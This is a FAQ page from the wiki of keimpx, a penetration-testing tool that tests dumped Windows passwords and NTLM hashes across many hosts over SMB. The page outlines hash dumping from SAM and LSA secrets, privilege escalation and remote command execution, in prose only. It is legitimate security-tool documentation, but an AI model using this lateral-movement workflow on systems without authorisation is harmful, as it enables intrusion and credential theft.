Skip to content
inquisb edited this page Jun 26, 2012 · 1 revision

Frequently Asked Questions

What is this tool about

Please, refer to the README.

It basically takes in a single pair of credentials or a list of credentials (plain-text passwords or as NTLM hashes outputted by password hashes dump tools, a single host or a list of hosts. It will then try off combinations of the user credentials and hosts to see where they work.

When is it useful?

It comes handy when you are in front of a large Windows network during a penetration test, have owned one of the workstations (or a server) and you want to check on which other systems you can login with the dumped hashes or cracked plain-text passwords.

Is it a sniffer or a password cracker?

Neither of them. Refer to the previous answers.

Does it exploit any security vulnerability?

No, it is a post-exploitation tool.

Ok, but how do I get these password hashes?

Once you are a high privileged user on a Windows system, you can dumps user's password hashes from Security Accounts Manager (SAM), LSA secrets, cached domain logon information, etc. Save all the dumped hashes on a text file and use it as the credentials file for this tool.

What if I am not a high privileged user on the Windows system?

As a penetration tester, you can escalate your privileges to Administrator or LOCAL SYSTEM before dumping the password hashes.

Aren't you reinventing the wheel?

As far as I know, there exist publicly three similar tools:

  • PsExec by Microsoft can be used to login via a single pair of user/password to a remote machine over SMB and execute commands. Single executable file, it works on any Windows system. It does not offer natively the ability to login by providing NTLM hashes.

  • smbshell by Tenable Security is a pre-compiled NASL script and it requires the nasl interpreter and a bunch of other Nessus libraries to run, not very convenient. Nevertheless, an advantage over PsExec is that it accepts also NTLM hashes. Like PsExec, it can be used to login onto one system at a time.

  • Metasploit's psexec exploit module can be used to login via a single pair of user/password or user/NTLM hash to a remote machine over SMB and execute commands. It is an enhanced version of the original standalone PsExec, but it requires to have direct access between the attacker machine and the target network (you could always pivot traffic through the owned Windows system via a Meterpreter session route option though) which is not always feasible, for instance, in a Citrix break-out where the back-end system is masked by a Citrix MetaFrame web interface. Like PsExec and smbshell, it can be used to login onto one system at a time unless a custom resource file is created to combine the smb_login auxiliary module with the psexec exploit module.

keimpx can be used to login over SMB onto a single target (like previous tools) or a list of targets by providing either a pair of user/password (like previous tools), a pair of user/NTLM hash (like smbshell and Metasploit's psexec exploit module), a list with the dumped hashes and eventually the cracked passwords. If valid credentials are detected on any of the targets, it can be used to enumerate shares, users, domains, password policy, list and deploy Windows services, execute operating system commands and, soon, access the Windows registry. Another advantage over smbshell and Metasploit's psexec exploit module is that it is a single Python script that requires the Python interpreter only to work, moreover the tool can be converted into a single executable file, then uploaded to the owned Windows system and run from there from command line, like PsExec. The other advantage over all the other tools is that it can primarily be used to check for the usefulness of a list of credentials, as in pairs of user/password, user/NTLM hash and user/NTLM session token, across the whole Windows network.

More questions

If you have any question, feel free to contact me.

Clone this wiki locally